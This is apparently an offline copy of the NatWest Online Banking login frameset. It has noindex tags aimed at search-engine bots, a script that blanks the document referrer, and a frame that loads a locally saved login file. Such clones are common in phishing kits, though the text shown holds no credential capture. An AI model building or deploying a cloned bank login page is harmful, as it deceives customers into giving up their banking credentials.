<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<!-- saved from url=(0050)https://www.onlinebanking.natwest.com/Default.aspx -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
   <head>
       <meta name="robots" content="noindex, nofollow">
        <meta name="googlebot" content="noindex, nofollow">
        <meta name="bingbot" content="noindex, nofollow">
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <script type="text/javascript">
         (function(){
         try {
         function getterHook(obj, name, cb) {
             if (document.__defineGetter__) {
                 document.__defineGetter__(name, cb);
                 return;
             }
             if ((obj && obj.prototype && Object) &&
                 (Object.getOwnPropertyDescriptor) &&
                 (Object.getOwnPropertyDescriptor(obj.prototype, name)) &&
                 (Object.getOwnPropertyDescriptor(obj.prototype, name).get) &&
                 (Object.getOwnPropertyDescriptor(obj.prototype, name).configurable)) {
                 Object.defineProperty(obj.prototype, name, { get : cb });
                 return;
             }
         }
         function asmReferrerGetter() { return ""; }
         getterHook(Document, "referrer", asmReferrerGetter);
         } catch(e) {}
         })();
         
      </script>
      <title>Log in to NatWest Online Banking</title>
      <meta name="description" content="NatWest Online Banking is easy, secure and lets you do all the things you need to do to manage your money online. Log in to NatWest Online Banking" id="description-meta-tag">
   </head>
   <frameset onload="startFrChecks()" onunload="dropAuth()" cols="*,0" border="0">
      <frame id="ctl00_secframe" title="Security Frame" frameborder="0" src="./index_files/login(1).html">
      
   </frameset>
</html>